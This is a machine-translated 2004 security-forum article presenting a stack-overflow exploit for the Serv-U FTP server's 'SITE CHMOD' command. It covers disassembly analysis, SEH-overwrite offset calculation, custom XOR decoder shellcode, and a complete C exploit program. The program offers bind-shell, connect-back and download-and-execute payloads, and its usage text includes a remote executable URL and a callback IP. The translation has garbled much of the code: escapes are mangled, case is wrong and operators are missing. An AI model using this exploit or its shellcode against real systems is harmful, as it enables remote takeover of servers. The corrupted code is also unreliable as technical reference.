Serv-U "Site Chmod XXX" EXPLOIT
Creation time: 2004-02-20
Article properties: reprint
Article submission:
Velvet (ZodiacSoft_AT_HOTMAIL.COM)
Forum login name: Swan
Submit email address: ????
Submit QQ number: ????
Copyright: Article is China Safety Net
Http://www.safechina.net and the author together, please indicate the source! !
Title: Serv-U "Site Chmod XXX" EXPLOIT
content:
KKQQ discovers SERV-U 4.x and in the following versions, a stack overflow occurs when it is passed to Site Chmod a long text name.
Let's briefly look at the analysis, first use the IDA to see the problematic place:
.text: 004194EB LOC_4194EB:; Code XREF: SUB_419080 457J
.TEXT: 004194EB PUSH [EBP VAR_8];
.TEXT: 004194EE PUSH 0FFFFFFFH
.TEXT: 004194F0 Push 4B4H
.text: 004194f5 Lea Eax, [ESI 8488H]
.text: 004194FB PUSH EAX
.TEXT: 004194FC CALL SUB_414344
.TEXT: 00419501 Add ESP, 0CH
.TEXT: 00419504 Push Eax; "550% s: no such file or directory."
.text: 00419505 LEA EDX, [EBP BUFFER]
.TEXT: 0041950B PUSH EDX
.TEXT: 0041950C Call _SPrintf; <== here
.TEXT: 00419511 Add ESP, 0CH
.TEXT: 00419514 LEA ECX, [EBP BUFFER]
.TEXT: 0041951A PUSH ECX
.TEXT: 0041951B PUSH ESI
.TEXT: 0041951C CALL SUB_433608
.TEXT: 00419521 Add ESP, 8
.text: 00419524 DEC [EBP VAR_38]
.text: 00419527 DEC [EBP VAR_38]
.TEXT: 0041952A CMP [EBP VAR_8], 0
.TEXT: 0041952E JZ LOC_4195BD
.text: 00419534 MOV EAX, [EBP VAR_8]
.Text: 00419537 MOV EDX, [EAX-0CH] When submitting a file that does not exist, Serv-U will feed back the message that the file is not found. The buffer that stores the error message is less than 0x1ec (?), And the actual file name is more than 0x500, and the Sprintf is getting more.
Still mainly for the use, you are interested in slowly analyze friends, it is estimated that I don't want to see me nonsense, I will find it back from above, and I naturally find the judgment command and deal.
When submitting a long file name, a memory access is generally occurring at .TEXT: 00419537 MOV EDX, [EAX-0ch], it usually occurs an exception of memory access. [EBP VAR_8] is made. In this way, the cover SEH address should be very easy to use this vulnerability, let us first use ollydbg to see the situation when an abnormality occurs.
EBP-58> 77E3929C USER32.77E3929C
EBP-54> 06EB06EB Pointer to Next SEH Record
EBP-50> 77E3929C SE HANDLER <= Need to be carefully covered;
EBP-4C> 06eb06eb
EBP-48> 77E3929C USER32.77E3929C
Buffer
EBP-1EC> 20303535
Calculate it, because the file name is started from the root of FTP, plus the previous "550", that is, Buffer must have a "550 /", this is 5 bytes, and it is simple to seem to be submitted. At 0x1ec - 0x50 - 0x5 = 0x197 = 407 byte, it is where the SEH is actually covered.
In fact, we may have no written permissions on the root directory. After the CWD to a writable directory, the buffer returned to the error message has become "550 / xxx /", and we should record the directory name when switching the directory. The length, the place where the actual coverage is 407 - Npathlen. Naturally, 403 - Npathlen's place should be a NOP / NOP / JMP 4, and 411 - Npathlen will start to be shellcode.
Before the memory access exception, there are two dec [EBP VAR_38] We have to pay attention to it, because this will change our shellcode, 425 - Npathlen's characters can be solved.
Due to the protocol of FTP itself, and if the data we submit, "", "," "?", "/", "", ",", "?", "/", And 0xffff, 0x0a, etc., existing markets Shellcode does not meet the requirements and rewrite it slightly.
The problem is generally because shellcode has illegal characters in the forefront of the decoding process, and the EBX address is determined by the EBX address when the control is obtained (we originally jmp ebx), So directly calculate the actual SHELLCODE address to start decoding, or starting from EBX to start searching, I am taking a way. After the rewritten decoding portion is as follows, because of the relationship of debugging, many 0x90 places are 0xcc, and later did not change back :-)
"/ x90 / x5 / x50 / x50 / x50 / x4b / x40 / x39 / x18 / x75 / xfb / x40 / x40" "/ x40 / x33 / xc9 / x90 / x90 / x66 / xb9 / X7D / X01 / X80 / X34 / X08 / X99 / XE2 / XFA / X90 ""
"/ X50 / x50 / x50 / x50"
90 NOP
8B C3 MOV EAX, EBX
BB 51 50 50 50 MOV EBX, 50505051H
4b Dec EBX
40 INC EAX
39 18 CMP DWORD PTR [EAX], EBX
75 FB JNE -5; to Inc EAX
40 INC EAX
40 INC EAX
40 INC EAX
33 c9 xor ECX, ECX
90 NOP
90 NOP; Remember to 2 here, it is 0x92
66 b9 7d 01 MOV CX, 17DH; decoded length, 17d is enough
80 34 08 99 xor Byte Ptr [EAX ECX], 99H
E2 fa loop -6; to xor
90 NOP
50 push eax; _emit 50h
50 push eax
50 push eax
50 push eax
It means that the 0x50505050 as a mark (itself is also executable, push eax), Dec EBX (preventing the wrong place), then start looking for Encode's real shellcode, final decoding from EAX (original EBX) . Due to the 21st bytes twice, it is necessary to make up. The last processed BIND53 shellcode is like this, removed the original head, changed the one mentioned above:
"/ x90 / x5b / xc3 / xbb / x51 / x50 / x50 / x50 / x4b / x40 / x39 / x18 / x75 / xfb / x40 / x40"
"/ x40 / x33 / xc9 / x90 / x92" // 92? Yes, 0x92! Two Nops for Fun
//.text:00419524 dec [EBP VAR_38]
//.text:00419527 dec [EBP VAR_38]
"/ x66 / xb9 / x7d / x01"
"/ x80 / x34 / x08 / x99 / x30 / x50 / x50" // bind port 53, lion's shellcode
"/ x70 / x99 / xc3 / xfd / x38 / xa9 / x99 / x99 / x99 / x12 / xd9 / x95 / x12"
...
You can also improve it slightly. After streamlined, it became this:
// Search from EBX and DECODE
"/ XBE / X0C / X99 / XE2 / XFA / X4E / X43 / X39 / X33 / X75 / XFB / X83 / XC3 / X03 / X33 / XC9"
"/ x66 / xb9 / x80 / x01 / x80 / x34 / x0b / x99 / xe2 / xfa"
Mov ESI, 0xFAE2990C
Dec ESI
FINDSC_LOOP:
Inc EBX
CMP DWORD PTR [EBX], ESI
JNE FINDSC_LOOP
Add Ebx, 3
XOR ECX, ECX
MOV CX, 180H
Decode_loop:
XOR BYTE PTR [EBX ECX], 99H
Loop decode_loop
Of course, directly calculate the start address of Real shellcode, this is relatively universal, we assume that the structure is like this:
----- ------------- ------------ ------ ------ -------------
Aa ... | 90 90 JMP 4 | RET (JMP EBX) | Decode | Encode Shellcode
----- ------------- ------------ ------ ------ -------------
^^ - EBX
When Decode got control, EBX pointed to the first 0x90, that is, the length of EBX 8 Decode is the first address of Encoded shellcode, first write a decode framework, then EBX can determine
Add EBX, 5; <== This value is presented
XOR ECX, ECX
MOV CX, 180H
Decode_loop:
XOR BYTE PTR [EBX ECX], 99H
Loop decode_loop
Judging the length, it is 15, such a child, EBX should add 8 15 = 23 = 0x17, but in fact, because the ECX to 0 will not jump back and execute XOR after LOOP, so EBX should add 0x16, put 0x16 fill in 0x16 Go back. The final result is:
"/ x83 / xc3 / x16 / xb9 / x83 / x01 / x80 / x34 / x0b / x99 / xe2 / xfa"
Fifteen bytes of decode, huh, the shortest ~
If it is Download & Exec's shellcode, a little troublesome, because ":" can't appear. Don't want to typing, see how XPLOIT is handled. I don't like typing at all, write xploit for 2 hours, typing for so long ...
With the following XPloIT, the setting Timeout is 1 second. Generally speaking, if you stop a second after Change Dir and then come out, you are really successful. If you come out to success, you must have an overwrite address is not Serv-U hang. JMP EBX is 0x7ffa4a1b, which is more effective for CN / EN Win2k, try it yourself, and change it. The program is not well written, some judgment just wants to be of course, it is very likely to positively report some results, you can also remove all IF (Buff [0]! = '2') judgment to the default every step is correct, too You can set the timeout (default is one second). I have a good job in IV-U 4.1.0.3/4.1.0.2/4.0.3/4.1.0.2/4.0.3.3.0.0.0.0.0.0.
/ *
Kkqq Found That When Connecting to A FTP Server Using Serv-U (v4.x and best),
The Operation "Site Chmod 755
This is Only Exploitable when you have the Writing Privilege.
ER, IDA Told me That:
.TEXT: 004194EB LOC_4194EB:; Code Xref: SUB_419080 457.J
.TEXT: 004194EB PUSH [EBP VAR_8]; Point to FileName
.TEXT: 004194EE PUSH 0FFFFFFFH
.TEXT: 004194F0 Push 4B4H
.text: 004194f5 Lea Eax, [ESI 8488H]
.text: 004194FB PUSH EAX
.TEXT: 004194FC CALL SUB_414344
.TEXT: 00419501 Add ESP, 0CH
.text: 00419504 Push Eax; Format = "550% S: No Such file or directory."
.text: 00419505 LEA EDX, [EBP BUFFER]
.TEXT: 0041950B PUSH EDX
.text: 0041950c call _sprintf; <============== ^ _ ^
.TEXT: 00419511 Add ESP, 0CH
.TEXT: 00419514 LEA ECX, [EBP BUFFER]
.TEXT: 0041951A PUSH ECX
.TEXT: 0041951B PUSH ESI
.text: 0041951C Call Sub_433608.text: 00419521 Add ESP, 8
.TEXT: 00419524 DEC [EBP VAR_38]; this is why 0x92 Appears
.text: 00419527 DEC [EBP VAR_38]
.TEXT: 0041952A CMP [EBP VAR_8], 0
.TEXT: 0041952E JZ LOC_4195BD
.TEXT: 00419534 MOV EAX, [EBP VAR_8]; <== Attention
.text: 00419537 MOV EDX, [EAX-0CH]; <== my ollydbg stopped here and @ # $! @ # Then
Shellcode Ran ^ _ ^. Choosing a value (address)
; That Could Be Read for EAX Would Lead Another Way
* /
#include
#include
#include
#pragma comment (Lib, "WS2_32")
Void Help (Char * Program)
{
Printf ("================================================ ========= / r / n ");
Printf ("Serv-U /" Site Chmod XXX LongFileName / "XPLOIT V0.20 Alpha / R / N");
Printf ("Originally Discovered by KKQQ @ USTC - THANK you ~ (* ^ _ ^ *) / r / n");
Printf ("For Serv-U 4.x with win2k written by swan @ seu / r / n");
Printf ("================================================ ========= / r / n / r / n ");
Printf ("USAGE:% s
Printf ("% s
Printf ("e.g.: / r / n");
Printf ("(1) You Have Write Privilege At / UPLOAD / / R / N");
Printf ("% s 127.0.0.1 21 Test Test Upload
http://hack.co.za/swan.exe/r/n ", program);
Printf ("(2) You Have Write Privilege At root / r / n");
Printf ("% S 127.0.0.1 21 Test Test / 202.119.9.42 8111 / R / N", Program);
Printf ("/ R / N this is an overwrite-seh-and-call-ebx version (jmp ebx AT 0x7ffa4a1b), / r / n");
Printf ("Choose a Mode You Like to Open Port 53, Connect Back or Download & Exec./R/N");
Printf ("For XP / 2k3, You May Try to Exploit this in another way ... / r / n");
Return;
}
Unsigned char bpsc [] =
// "decoding" Code Should Not Contain / XFF / XFF / XFF NOR / X0A NOR ':' ...
// So Search from Ebx, To Find The Head of the Encoded Shellcode
"/ x90 / x5b / xc3 / xbb / x51 / x50 / x50 / x50 / x4b / x40 / x39 / x18 / x75 / xfb / x40 / x40"
"/ x40 / x33 / xc9 / x90 / x92" // 92? Yes, 0x92! Two Nops for Fun
//.text:00419524 dec [EBP VAR_38]
//.text:00419527 dec [EBP VAR_38]
"/ x66 / xb9 / x7d / x01"
"/ x80 / x34 / x08 / x99 / x, xfa / x90 / x50 / x50 / x50 / x50"
// Bind Port 53
"/ x70 / x99 / xc3 / xfd / x38 / xa9 / x99 / x99 / x99 / x12 / xd9 / x95 / x12"
"/ XE9 / X85 / X91 / X12 / XD9 / X12 / XEA / XA5 / X12 / XED / X87 / XE1 / X9A"
"/ X6A / X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA / X74 / XCF / XCE / XC8 / X12 / XA6" "/ X9A / X62 / X12 / X6B / XF3 / X97 / XC0 / X6A / X3F / XED / X91 / XC0 / XC6 / X1A / X5E / X9D "
"/ xdc / x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf / xbd / x9a / x5a / x48 / x78 / x9a"
"/ X58 / XAA / X50 / XDF / X1 / X9A / X5A / X58 / X78 / X9B / X9A / X58"
"/ X12 / X99 / X9A / X5A / X12 / X63 / X12 / X6E / X1A / X5F / X97 / X12 / X49 / XF3 / X9A / XC0"
"/ x71 / x1e / x99 / x99 / x99 / x1a / x5f / x94 / xcb / xcf / x66 / xce / x65 / xc3 / x12 / x41"
"/ Xf3 / X9C / XC0 / X71 / XED / X99 / X99 / X99 / XC9 / XC9 / XC9 / XC9 / XF3 / X98 / XF3 / X9B"
"/ X66 / XCE / X75 / X12 / X41 / X5E / X9E / X9B / X99"
"/ x99 / xac" // <== port xor 0x9999, Default IS 53
"/ XAA / X59 / X10 / XDE / X9D"
"/ XF3 / X89 / XCE / XCA / X66 / XCE / X69 / XF3 / X98 / XCA / X66 / XCE / X6D / XC9 / XC9 / XCA"
"/ x66 / xcE / x61 / x12 / x49 / x1a / x75 / xdd / x12 / x6d / xaa / x59 / xf3 / x89 / xc0 / x10"
"/ x9d / x17 / x7b / x62 / x10 / xcf / xa1 / x10 / xcf / xa5 / x10 / xcf / xd9 / xff / x5e / xdf"
"/ xb5 / x98 / x98 / x14 / xde / x89 / xc9 / xcf / xaa / x50 / xc8 / xc8 / xc8 / xf3 / x98 / xc8"
"/ xc8 / x5e / xde / xa5 / xfa / xf4 / XFD / X99 / X14 / XDE / XA5 / XC9 / XC8 / X66 / XCE / X79"
"/ XCB / X66 / XCE / X65 / XCA / X66 / XCE / X65 / XC9 / X66 / XCE / X7D / XAA / X59 / X35 / X1C"
"/ X59 / XEC / X60 / XC8 / XCB / XCF / XCA / X66 / X4B / XC3 / XC0 / X32 / X7B / X77 / XAA / X59"
"/ x5a / x71 / x76 / x67 / x66 / x66 / xde / xfc / xed / xc9 / xeb / xf6 / xfa / xd8 / xfd / xfd"
"/ XEB / XFC / XEA / XEA / X99 / XDA / XEB / XFC / XF8 / XED / XFC / XC9 / XEB / XF6 / XFA / XFC"
"/ XEA / XEA / XD8 / X99 / XDC / XE1 / XF0 / XED / XCD / XF1 / XEB / XFC / XF8 / XFD / X99 / XD5"
"/ XF6 / XF8 / XFD / XD5 / XF0 / XFB / XEB / XF8 / XEB / XE0 / XD8 / X99 / XEE / XEA / XAB / XC6"
"/ XAA / XAb / X99 / XCE / XCA / XD8 / XCA / XF6 / XFA / XF2 / XFC / XED / XD8 / X99 / XFB / XF0"
"/ XF7 / XFD / X99 / XF5 / XF0 / XEA / XED / XFC / XF7 / X99 / XF8 / XFA / XFA / XFC / XE9 / XED"
"/ x99 / xfa / xf5 / xf6 / xea / xfc / xea / xf6 / xfa / xf2 / xfc / xed / x99";
#define ip_offset 249 # Define port_offset 244
Unsigned char CBSC [] =
// Search from EBX and DECODE
"/ XBE / X0C / X99 / XE2 / XFA / X4E / X43 / X39 / X33 / X75 / XFB / X83 / XC3 / X03 / X33 / XC9"
"/ x66 / xb9 / x80 / x01 / x82 / x34 / x0b / x99 / xe2 / xfa"
// Connect Back
// from
http://www.xfocus.net/articles/200307/574.html
"/ x70 / x99 / xc3 / x21 / x95 / x69 / x64 / x12 / x12 / x99 / x12 / xe9 / x85"
"/ x34 / x12 / x41 / x12 / x12 / xa5 / x9a / x6a / x12 / Xef / xe1 / x9a / x6a"
"/ X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA / X74 / XCF / XCE / XC8 / X12 / XA6 / X9A"
"/ x62 / x12 / xc0 / x6a / x3f / xd / x91 / xc0 / xc6 / x1a / x5e / x9d / xdc"
"/ x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf / xbd / x9a / x5a / x48 / x78 / x9a / x58"
"/ xaa / x50 / x12 / xdf / x85 / x9a / x5a / x58 / x78 / x9b / x9a / x58 / x12"
"/ x99 / x9a / x5a / x12 / x63 / x12 / x6e / x1a / x5f / x97 / x12 / x49 / xf3 / x9a / xc0 / x71"
"/ XE9 / X99 / X99 / X99 / XCB / XCF / X66 / XCE / X65 / XC3 / X12 / X41 / XF3"
"/ X9B / XC0 / X71 / XC4 / X99 / X99 / X99 / X1A / X75 / XDD / X12 / X6D / XF3 / X89 / XC0 / X10"
"/ X9D / X17 / XC9 / XC9 / XC9 / XF3 / X98 / XF3 / X9B / X66 / XCE / X61 / X12"
"/ X41 / X10 / XC7 / XA1 / X10 / XC7 / XA5 / X10 / XC7 / XD9 / XFF / X5E / XDF / XB5 / X98 / X98"
"/ X14 / XDE / X89 / XC9 / XCF / XAA / X59 / XC9 / XC9 / XC9 / XF3 / X98 / XC9 / XC9 / X14 / XCE"
"/ XA5 / X5E / X9B / XFA / XF4 / XFD / X99 / XCB / XC9 / X66 / XCE / X75 / X5E / X9E / X9B / X99"
"/ x9e / x24 / x5e / xde / x9d / x98 / x99 / x99 / x98 / xf3 / x89 / xce / xca / x66 / xce / x65"
"/ XC9 / X66 / XCE / X69 / XAA / X59 / X35 / X1C / X59 / XEC / X60 / XC8 / XCB / XCF / XCA / X66"
"/ x4b / xc3 / xc0 / x32 / x7b / x77 / xaa / x59 / x5a / x71 / x9e / x66 / x66 / x66 / xde / xfc"
"/ XED / XC9 / Xeb / XF6 / XFA / XD8 / XFD / XFD / XEB / XFC / XEA / XEA / X99 / XDA / XEB / XFC"
"/ XF8 / XED / XFC / XC9 / XEB / XEA / XFA / XFC / XEA / XEA / XD8 / X99 / XDC / XE1 / XF0 / XED"
"/ XC9 / XEB / XF6 / XFA / XFC / XEA / XEA / X99 / XD5 / XF6 / XF8 / XFD / XD5 / XF0 / XFB / XEB" "/ XF8 / XEB / XE0 / XD8 / X99 / XEE / XEA / XAB / XC6 / XAA / XAB / X99 / XCE / XCA / XD8 / XCA "
"/ XF6 / XFA / XF2 / XFC / XED / XD8 / X99 / XFA / XF6 / XF7 / XF7 / XFC / XFA / XED / X99"
Unsigned char dehead [] =
"/ x90 / x5b / xc3 / xbb / x51 / x50 / x50 / x50 / x4b / x40 / x39 / x18 / x75 / xfb / x40 / x40"
"/ x40 / x92 / x66 / xb9 / xf0 / x01 / x80 / x34 / x08 / x99 / xe2 / xfa / x90"
"/ X50 / x50 / x50 / x50"
// Download & EXECUTE
// modified slightly ...
"/ x70 / x4d / x99 / x99 / x99 / xc3 / x21 / x95 / x69"
"/ x64 / x12 / x12 / x85 / x34 / x12 / xd9 / x91 / x12 / x41 / x12 / xaa / xa5"
"/ X9A / X6A / X12 / XEF / XE1 / X9A / X6A / X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA"
"/ X74 / XCF / XCE / XC8 / X12 / Xa6 / X9A / X62 / X12 / X6B / XF3 / X97 / XC0 / X6A / X3F / XED"
"/ x91 / xc0 / xc6 / x1a / x5e / x9d / xdc / x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf"
"/ xbd / x9a / x5a / x48 / x78 / x9a / x58 / xaa / x50 / xff / x12 / x91 / x12 / xdf / x85 / x9a"
"/ x5a / x58 / x58 / x12 / x99 / x9a / x5a / x12 / x63 / x12 / x6e / x1a / x5f"
"/ X97 / X12 / XC0 / X71 / XC9 / X99 / X99 / X99 / X1A / X5F / X94 / XCB / XCF"
"/ X66 / XCE / X65 / XC3 / X12 / X41 / XF3 / X98 / XC0 / X71 / XA4 / X99 / X99 / X99 / X1A / X5F"
"/ x8a / xcf / xdf / x19 / xa7 / x19 / xec / x63 / x19 / xaf / x19 / xc7 / x1a / x75 / xb9 / x12"
"/ X45 / XF3 / XB9 / XCA / X66 / XCE / X75 / X5E / X9D / X9A / XC5 / XF8 / XB7 / XFC / X5E / XDD"
"/ X9A / X9D / XE1 / XAA / X59 / XC9 / XC9 / XCA / XCF / XC9 / X66 / XCE / X65"
"/ X12 / X45 / XC9 / XCA / X66 / XCE / X69 / XC9 / X66 / XCE / X6D / XAA / X59 / X35 / X1C / X59"
"/ XEC / X60 / XC8 / XCB / XCF / XCA / X66 / X4B / XC3 / XC0 / X32 / X7B / X77 / XAA / X59 / X5A"
"/ x71 / xbe / x66 / x66 / x66 / xde / xfc / xed / xc9 / xeb / xf6 / xfa / xd8 / XFD / XFD / XEB"
"/ XFC / XEA / XEA / X99 / XDE / XEA / XED / XCA / XE0 / XEA / XED / XFC / XF4 / XDD / XF0 / XEB"
"/ XFC / XFA / XED / XF6 / XEB / XE0 / XD8 / X99 / XCE / XE1 / XFC / XFA / X99"
"/ xdc / xe1 / xf0 / xed / xc9 / xeb / xf6 / xfa / xfc / xea / xea / x99 / xd5 / xf6 / xf8 / xfd" "/ xd5 / xf0 / xfb / xeb / xf8 / XEB / XE0 / XD8 / X99 / XEC / XEB / XF5 / XF4 / XF6 / XF7 / X99 "
"/ XCC / XCB / XD5 / XDD / XF6 / XEE / XF7 / XF5 / XF6 / XF8 / XFD / XCD / XF6 / XDF / XF0 / XF5"
"/ xfc / xd8 / x99";
// "
http://127.0.0.1/hello.exe "
// "/ x80";
UNSIGNED CHAR DESC [500] = {0};
Void main (int Argc, char * argv [])
{
Wsadata wsadata;
Socket S;
Struct hostent * he;
Struct sockaddr_in host;
INT ntimeout = 1000;
IF (argc! = 6 && argc! = 7 && argc! = 8)
{
Help (Argv [0]);
Return;
}
IF (argc == 7)
{
// Initialize The Download & Execute Shellcode
// shellcode head (URL 0x80) xor 0x99) <== all for damned ':' and '/'
MEMSET (DESC, 0, 500);
Memcpy (desc, dehead, sizeof (dehead));
CHAR URL [255];
STRCPY (URL, Argv [6]);
STRCAT (CHAR *) URL, "/ x80");
For (unsigned int j = 0; j URL [J] = URL [J] ^ '/ X99'; STRCAT ((Char *) DESC, URL); } IF (argc == 8) { Unsigned short port = htons (ATOI (Argv [7])) ^ (u_short) 0x9999; Unsigned long ip = inet_addr (argv [6]) ^ 0x99999999; Memcpy (& CBSC [Port_offset], & Port, 2); Memcpy (& CBSC [IP_OFFSET], & IP, 4); } IF (WSAStartup (0x0101, & WSADATA)! = 0) { Printf ("ERROR Starting Winsock .."); Return; } IF ((he = gethostByname) == 0) { Printf ("Failed Resolving '% S'", Argv [1]); Return; } Host.sin_port = Htons (ATOI (ARGV [2])); Host.sin_family = AF_INET; Host.sin_addr = * (Struct In_ADDR *) HE-> H_ADDR); IF ((S = Socket (AF_INET, SOCK_STREAM, 0) == -1) { Printf ("Failed Creating Socket"); Return; } IF ((S., Struct SockAddr *) & Host, SizeOf (Host)) == -1) { Printf ("Failed Connecting to Host / R / N"); Return; } Setsockopt (S, SOL_Socket, SO_RCVTIMEO, (CHAR *) & ntimeout, sizeof (ntimeout)); Char buff [50000] = {0}; MEMSET (BUFF, 0, SIZEOF (BUFF)); Char szuser [255] = {0}; STRCPY (SZUser, "User"); STRCAT (SZUSER, Argv [3]); STRCAT (SZUSER, "/ R / N"); Char szpass [255] = {0}; STRCPY (Szpass, "Pass"); STRCAT (SZPASS, Argv [4]); STRCAT (SZPASS, "/ R / N"); INT BREAD = RECV (S, Buff, Sizeof (BUFF), 0); IF (BREAD == -1) { CloseSocket (s); Printf ("No Response ... Perhaps it has been hacked! / r / n"); Return; } Printf (BUFF); // send User Send (S, Szuser, Strlen (Szuser), 0); MEMSET (BUFF, 0, SIZEOF (BUFF)); RECV (S, BUFF, SIZEOF (BUFF), 0); Printf (BUFF); // send pass Send (S, Szpass, Strlen (Szpass), 0); MEMSET (BUFF, 0, SIZEOF (BUFF)); RECV (S, BUFF, SIZEOF (BUFF), 0); Printf (BUFF); IF (buff [0]! = '2') { CloseSocket (s); Printf ("Authentication Failed! / R / N"); Return; } // Change Dir Char szchangedir [255] = {0}; STRCPY (SzchangeDir, "CWD /"); Strcat (SzchangeDir, Argv [5]); STRCAT (SZCHANGEDIR, "/ R / N"); Send (s, szchangedir, strlen (szchangedir), 0); MEMSET (BUFF, 0, SIZEOF (BUFF)); RECV (S, BUFF, SIZEOF (BUFF), 0); Printf (BUFF); IF (buff [0]! = '2') { CloseSocket (s); Printf ("Error Changing Path! / R / N"); Return; } Int npathlen = Strlen (Argv [5]) 1; IF (argv [5] [npathlen-2] == '/') Npathlen - IF (npathlen == 1) Npathlen - Char XPloit [1500] = {0}; CHAR head [] = "Site Chmod 755"; CHAR EVIL [1000] = {0}; MEMSET (XPLOIT, 0, SIZEOF (XPLOIT); For (int i = 0; i <403; i ) Evil [I] = '/ x90'; * (INT *) (Evil 403 - Npathlen) = 0x04eb9090; // NOP NOP JMP 4 * ((int *) (Evil 407 - npathlen) = 0x7ffa4a1b; // JMP EBX IF (argc == 6) Memcpy (Evil 411 - Npathlen, BPSC, SIZEOF (BPSC)); IF (argc == 7) Memcpy (Evil 411 - Npathlen, DESC, STRLEN ((char *) DESC); IF (argc == 8) Memcpy (Evil 411 - Npathlen, CBSC, SIZEOF (CBSC)); STRCPY (XPLOIT, HEAD); STRCAT (XPLOIT, EVIL); STRCAT (XPLOIT, "/ R / N"); Send (S, XPLOIT, STRLEN (XPLOIT), 0); MEMSET (BUFF, 0, SIZEOF (BUFF)); Bread = RECV (S, Buff, Sizeof (BUFF), 0); IF (BREAD == -1) { CloseSocket (s); IF (argc == 6) Printf ("Success! Try Connect Port 53 TO GET Your Shell ... / R / N"); IF (argc == 7) Printf ("Success! Host Has Download and Execute The Program ... / r / n"); IF (argc == 8) Printf ("Success! See your nc.exe ... / r / n"); Return; } Printf ("Failed ... Perhaps it has been patched, or you don't have the write privilege! / r / n"); CloseSocket (s); Return; }
